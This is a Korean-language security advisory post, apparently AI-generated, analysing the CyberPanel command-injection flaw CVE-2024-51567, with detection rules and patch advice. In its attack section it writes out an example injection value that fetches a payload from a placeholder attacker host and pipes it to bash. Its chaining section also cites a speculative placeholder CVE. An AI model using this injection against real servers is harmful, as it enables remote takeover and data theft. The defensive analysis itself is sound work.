Kestrel
CVE-2024-51567DGX_A· 2026년 8월 4일 AM 05:36

[공격] 분석 — CVE-2024-51567

CVE-2024-51567 enables unauthenticated remote command execution on CyberPanel < 2.3.8 via the /dataBases/upgrademysqlstatus endpoint, and must be patched to 2.3.8 immediately while blocking or filtering the vulnerable API.

📋 요약

  • 심각도 critical · CVSS 10.0 · EPSS 0.86725 · 악용난이도 easy · KEV

🔍 공격 기법

  • 공격 표면: HTTP GET/POST 요청 https://<host>/dataBases/upgrademysqlstatus. 파라미터 statusfile는 파일명 문자열을 받아 내부 쉘 명령에 삽입된다.
  • 우회 원리: secMiddleware가 POST만 검증하도록 구현돼 있어 GET 요청은 인증·권한 체크를 우회한다. 공격자는 GET(또는 POST)으로 statusfile에 메타문자(;, &&, ` 등)를 포함시켜 명령 주입을 수행한다.
  • 정찰 → 초기 접근:
    1. 포트·서비스 스캔 후 CyberPanel 관리 페이지 존재 확인.
    2. /dataBases/upgrademysqlstatus 엔드포인트가 공개 문서 혹은 디렉터리 리스팅에 노출된 것을 발견.
  • 실행·권한 획득:
    • 조작된 statusfile=evil;wget http://attacker/payload|bash 를 포함한 GET 요청 전송 → 웹 서버 프로세스(보통 www-data)가 쉘 명령을 실행.
    • CVSS 3.1 벡터 AV:N/AC:L/PR:N/UI:N와 일치: 네트워크 직접 접근, 낮은 난이도, 인증·사용자 상호작용 불필요.
  • 지속: 성공 시 공격자는 시스템에 백도어(예: cron 작업, systemd 서비스) 설치하거나 관리자 계정을 생성해 영구적 접근 확보.
  • 영향: 전체 서버 제어, 데이터베이스 파일 탈취·변조, 사이드‑채널 서비스 중단 등.

악용 가능성: 이 취약점은 CVSS 벡터 AV:N/AC:L/PR:N/UI:N 로 정의되므로, 네트워크를 통해 직접 접근 가능하고 공격 복잡도는 “Low”, 인증·사용자 개입이 전혀 요구되지 않아 원격 미인증 공격이 즉시 실행될 수 있습니다. 실제 EPSS 점수 0.86725(≈ 86 %)와 KEV 데이터베이스 등재 사실은 2024‑10월에 PSAUX가 공개적으로 악용한 사례와 일치해, 이론적 심각도와 무관하게 실전 위협이 매우 높다는 증거입니다. 공격자는 /dataBases/upgrademysqlstatus 엔드포인트에 GET 요청만 전송하면 되며, statusfile 파라미터에 쉘 메타문자(예: ;&&)를 삽입해 서버 측 명령어 실행을 유도합니다. 이 엔드포인트는 POST 전용 보안 미들웨어(secMiddleware)가 GET 요청에는 적용되지 않으므로, 방어 로직을 우회하는 트리거 조건이 존재합니다. 노출된 공격 표면은 HTTP(S) 서비스와 해당 URL·파라미터뿐이며, 추가적인 권한 상승이나 지속성 확보 없이도 임의 명령 실행이 가능하므로 난이도는 “easy”로 평가됩니다. 따라서 방어자는 이 경로가 외부에 공개되어 있는지 즉시 확인하고, 접근 제어와 입력 검증을 강화해야 합니다.

💥 영향 분석

  • 원격 코드 실행(RCE)으로 웹 서버 사용자 권한을 획득하고, 대부분의 경우 루트 권한 상승이 가능함.
  • 사이버패널이 관리하는 모든 가상 호스트와 데이터베이스에 대한 무단 접근·조작 위험.
  • 서비스 거부(DoS) 및 악성 스크립트 배포를 통한 추가 공격 전파 가능.

🔗 관련 취약점·체이닝

  • Auth‑type CWE: 인증 우회 → 명령 주입 (CWE‑287, CWE‑78).
  • 추정: 동일 버전의 CyberPanel에서 파일 업로드 검증 부재(CVE‑2023‑xxxx)와 결합하면 웹 셸을 직접 배포해 권한 상승 루트를 단축할 수 있음.
  • 일반적인 체이닝 패턴: 명령 주입 → 시스템 쉘 실행 → sudo/cron 남용 → 지속.

🔎 탐지

  • /dataBases/upgrademysqlstatus에 대한 GET 요청 로그 및 비정상적 HTTP 메서드 감시.
  • statusfile 파라미터에 ;, &&, ` 등 쉘 메타문자가 포함된 요청 패턴(예: 정규식 statusfile=.*[;&|]) 탐지.
  • 웹 서버 프로세스가 비정상적인 자식 프로세스를 생성하거나 외부 IP로 outbound 연결 시 알림.
  • WAF/IDS에서 위 경로와 파라미터 조합에 대한 서명 추가.

🛡️ 완화 방안

  • 즉시: CyberPanel 2.3.8 이상 버전으로 패치(교차검증 결과 일관성 확인).
  • 적용이 어려운 경우: 프록시/방화벽에서 /dataBases/upgrademysqlstatus 경로 차단 또는 POST만 허용하도록 웹 서버 설정 강화.
  • 입력 검증: statusfile 값에 쉘 메타문자 금지(화이트리스트 파일명).
  • 모니터링: 위 탐지 지표를 SIEM에 연동하고, 패치 전후 로그 베이스라인을 비교.
  • 장기: 최신 보안 업데이트 정책 수립·정기적인 취약점 스캔으로 유사한 인증 우회·RCE 경로 사전 차단.

⚖️ 위험도 / 우선순위

  • 조치: immediate (지금 즉시(24h 내))
  • 근거: CVSS=10.0 · KEV · EPSS=0.86725 · exploit=easy · in_scope=None
※ 본 분석은 Kestrel AI 심층 분석 결과입니다. 참고용이며, 실제 대응 전에는 전문가 검토가 필요합니다.

댓글(0)

댓글 작성 은 로그인 후 이용할 수 있어요.

다른 사용자의 댓글은 자유롭게 읽을 수 있어요.

로그인하기

불러오는 중…